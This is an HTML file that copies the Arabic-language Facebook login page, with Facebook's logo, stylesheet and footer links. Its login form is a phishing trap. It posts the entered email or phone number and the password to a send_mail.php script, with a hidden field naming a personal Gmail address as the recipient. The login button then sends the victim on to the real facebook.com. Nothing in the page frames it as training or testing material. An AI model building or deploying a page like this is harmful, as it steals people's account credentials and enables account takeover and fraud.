 <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="Css.css">
   <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/1,cross/OWbPCz2Tq_e.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="hblrIPZ" crossorigin="anonymous">

</head>
<body>
    <div class="imgs">
<img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="فيسبوك">
<h2 class="_8eso">يمنحك فيسبوك إمكانية التواصل مع الأشخاص ومشاركة ما تريد معهم.</h2>
</div>

    <div class="container">
         <form method="post" action="send_mail.php">
         <input  class="Sendmail" hidden  type="text" name="mail_to" value="maissahani@gmail.com"> 
           <input class="mailer" required placeholder="البريد الإلكتروني أو رقم الهاتف" type="email" name="mail_sub">
       
          <input required placeholder="كلمة السر" type="text" name="mail_msg">
       
           
        
        <div class="Login">
            <button class="Logins"  id="Welcome" onclick="window.location = 'https://facebook.com'" >تسجيل الدخول</button>
        </div>
        </form>
        <a class="Forget" href="#">هل نسيت كلمة السر</a>
        <div class="hr"></div>
        <div class="create">
            <button class="createAcount">انشاء حساب جديد</button>
        </div>
        <span class="Word"><a class="Createa" href="#"> انشاء صفحة‏ </a><span> لفرق موسيقية أو مشاهير أو أنشطة تجارية.</span> </span>
    </div> 

<div class="LanguagesContainer">
  
<div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>العربية</li><li><a class="_sv4" dir="ltr" href="https://www.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;en_US&quot;, &quot;ar_AR&quot;, &quot;https:\/\/www.facebook.com\/&quot;, &quot;www_list_selector&quot;, 0); return false;" title="English (US)">English (US)</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;ar_AR&quot;, &quot;https:\/\/fr-fr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 1); return false;" title="French (France)">Français (France)</a></li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;ar_AR&quot;, &quot;https:\/\/de-de.facebook.com\/&quot;, &quot;www_list_selector&quot;, 2); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;ar_AR&quot;, &quot;https:\/\/es-la.facebook.com\/&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Spanish">Español</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;ar_AR&quot;, &quot;https:\/\/tr-tr.facebook.com\/&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Turkish">Türkçe</a></li><li><a class="_sv4" dir="ltr" href="https://ru-ru.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ru_RU&quot;, &quot;ar_AR&quot;, &quot;https:\/\/ru-ru.facebook.com\/&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Russian">Русский</a></li><li><a class="_sv4" dir="ltr" href="https://id-id.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;id_ID&quot;, &quot;ar_AR&quot;, &quot;https:\/\/id-id.facebook.com\/&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Indonesian">Bahasa Indonesia</a></li><li><a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_BR&quot;, &quot;ar_AR&quot;, &quot;https:\/\/pt-br.facebook.com\/&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Portuguese (Brazil)">Português (Brasil)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;ar_AR&quot;, &quot;https:\/\/it-it.facebook.com\/&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;ar_AR&quot;, &quot;https:\/\/hi-in.facebook.com\/&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Hindi">हिन्दी</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fhi-in.facebook.com%2F&amp;source=www_list_selector_more" href="#" title="عرض المزيد من اللغات"><i class="img sp_yKld3zCdbh4 sx_31e726"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="روابط موقع فيسبوك"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/r.php" title="التسجيل في فيسبوك">إنشاء حساب في فيسبوك</a></li><li><a href="/login/" title="تسجيل الدخول إلى فيسبوك">تسجيل الدخول</a></li><li><a href="https://messenger.com/" title="تفقد Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite لنظام Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="يمكنك تصفح مقاطع الفيديو الخاصة بنا على Watch."> Watch </a></li><li><a href="/places/" title="تعرّف على الأماكن الشهيرة على فيسبوك.">الأماكن</a></li><li><a href="/games/" title="تعرّف على ألعاب فيسبوك.">الألعاب</a></li><li><a href="/marketplace/" title="يمكنك البيع والشراء من خلال Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" target="_blank" title="تعرف على المزيد عن Facebook Pay">Facebook Pay</a></li><li><a href="/jobs/" title="تقدم واحصل على وظيفة على فيسبوك.">الوظائف</a></li><li><a href="https://www.oculus.com/" target="_blank" title="تعرف على المزيد عن Oculus">Oculus</a></li><li><a href="https://portal.facebook.com/" target="_blank" title="تعرف على المزيد عن Portal from Facebook">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT1zTnx77Jj6wpsaU-4Fs6eAePa6Gor2Wkq853XsZzoQIKi3GCWhKQEmfE2FoDaFlni4d-YpP_vi4aki_pgRujAl9oP9fplDWoKwvVAP51d_YlhHlQ2wIH8UUvlWAUZ4tpkaaaRMRQHTmBjomAdMQg" title="تعرف على Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="/local/lists/245019872666104/" title="يمكنك تصفح دليل قوائمنا المحلية.">محلية</a></li><li><a href="/fundraisers/" title="يمكنك التبرع للقضايا التي تستحق.">حملات جمع التبرعات</a></li><li><a href="/biz/directory/" title="يمكنك تصفح دليل خدمات فيسبوك.">الخدمات</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="يمكنك رؤية مركز معلومات التصويت.">مركز معلومات التصويت</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="اقرأ مدونتنا، واستكشف مركز الموارد، وابحث عن فرص العمل.">حول</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="الإعلان على فيسبوك.">إنشاء إعلان</a></li><li><a href="/pages/create/?ref_type=site_footer" title="إنشاء صفحة">إنشاء صفحة</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="قم بالتطوير في منصتنا.">المطوّرون</a></li><li><a href="/careers/?ref=pf" title="حقّق النجاح في مسيرتك المهنية، انتقل إلى شركتنا الرائعة.">الوظائف</a></li><li><a data-nocookies="1" href="/privacy/explanation" title="تعرف على الخصوصية وفيسبوك.">الخصوصية</a></li><li><a href="/policies/cookies/" title="تعرف على المزيد عن ملفات تعريف الارتباط وفيسبوك." data-nocookies="1">ملفات تعريف الارتباط</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="تعرف على أداة Ad Choices.">Ad Choices<i class="img sp_yKld3zCdbh4 sx_709729"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="الاطلاع على شروطنا وسياساتنا.">الشروط</a></li><li><a href="/help/?ref=pf" accesskey="0" title="تفضل بزيارة مركز المساعدة.">مساعدة</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="عرض وتعديل إعدادات فيسبوك.">الإعدادات</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="عرض سجل النشاطات">سجل النشاطات</a></li></ul></div><div class="mvl copyright"><div>Facebook © 2021<span></span></div></div></div></div></div>
</div>
</body>
</html>